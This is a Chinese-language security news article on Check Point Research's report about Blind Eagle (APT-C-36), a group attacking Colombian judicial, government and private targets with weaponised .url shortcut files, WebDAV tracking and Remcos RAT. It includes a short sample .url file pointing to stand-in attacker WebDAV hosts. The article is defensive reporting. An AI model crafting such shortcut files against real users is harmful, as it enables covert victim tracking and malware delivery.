Check Point Research(CPR)近期揭露了 Blind Eagle(APT – C – 36)一系列持续且有针对性的网络攻击活动。Blind Eagle 是拉丁美洲最危险的威胁行为者之一,主要目标是哥伦比亚的司法系统、政府机构以及私营组织。
该组织展现出了非凡的适应能力,在微软修复 CVE – 2024 – 43451 漏洞仅仅六天后,就采用了新的攻击技术,这表明攻击者如何能够将安全更新转变为针对目标的攻击武器。这种快速适应凸显了网络威胁正日益复杂,以及采取主动防御措施来对抗它们的必要性。
CPR 的调查显示,仅一周内就发现了超过 9000 起感染事件,这一惊人数字凸显了 Blind Eagle 策略的有效性。
这些攻击尤其令人担忧的地方在于,Blind Eagle 策略性地利用合法的基于云的服务来绕过传统的安全措施。
通过借助谷歌云端硬盘(Google Drive)、Dropbox、GitHub 和 Bitbucket 等受信任的平台来托管和分发恶意软件,该组织极大地增加了安全工具检测和标记其恶意活动的难度。这些平台通常被安全系统视为安全的,为恶意操作提供了完美的掩护。
这种方法还使该组织能够在不重新配置攻击基础设施的情况下快速更新其恶意软件有效载荷,提供了操作灵活性,从而提高了攻击效果。
Blind Eagle 采用的攻击方法显示出其对技术漏洞和人类行为的深刻理解。他们的方法只需极少的用户交互就能触发恶意软件的执行,这使得传统的安全意识作为防御措施的效果大打折扣。
用户仅仅右键点击、删除或拖动恶意文件,就可以触发 WebDAV 请求,这会通知攻击者该文件已被访问。如果受害者随后点击该文件,下一阶段的有效载荷就会被下载并执行,从而导致系统完全被攻陷。
将.url 文件武器化以进行隐秘攻击
Blind Eagle 当前攻击活动最具创新性的方面是将.url 文件武器化,用作跟踪和传递机制。这些经过特殊制作的快捷方式文件包含指向攻击者控制的 WebDAV 服务器的引用,既能够被动跟踪受害者,也能够主动传递恶意软件。其技术实现类似于以下结构:
[InternetShortcut]
URL=file://attacker-server/document
IconFile=\\attacker-webdav\share\icon.ico
IconIndex=0
这种方法的隐秘性使得检测尤其具有挑战性。与传统恶意软件不同,传统恶意软件需要用户打开附件或启用宏,而这些.url 文件是被动起作用的,甚至在被明确执行之前就会向攻击者报告。这使得 Blind Eagle 能够在部署完整的恶意软件有效载荷之前识别潜在受害者并确定攻击优先级。
一旦执行,最终部署的有效载荷是 Remcos RAT(远程访问木马),这是一种复杂的恶意软件,使攻击者能够完全控制受感染的机器。感染后,Remcos 可以通过记录按键操作和窃取存储的密码来获取用户凭证,修改和删除文件以破坏系统或加密数据进行勒索,通过计划任务和注册表修改来实现持久化以在重启后仍能存活,并将敏感信息泄露到 Blind Eagle 控制的命令与控制服务器。
Blind Eagle 将新修复的漏洞武器化的速度引发了关于不断演变的威胁态势的重要问题。威胁行为者不再等待零日漏洞,而是现在密切关注安全补丁,对其进行分析,并开发能够绕过新实施防御措施的类似技术。这表明网络犯罪分子正变得更加敏捷、创新和有备而来,这要求安全团队加快其补丁管理策略,并实施人工智能驱动的威胁预防解决方案,以便在新兴威胁站稳脚跟之前检测到它们。
Blind Eagle 采用的复杂策略代表了网络威胁方法的重大演变。通过利用受信任的平台并尽量减少所需的用户交互,这些攻击以惊人的效率绕过了传统的安全措施。组织必须通过实施全面的安全策略来应对,包括实时端点保护、增强的电子邮件安全以及对网络流量(特别是与可能被用作恶意软件传递渠道的合法云服务的连接)的持续监控。
发表评论
您还未登录,请先登录。
登录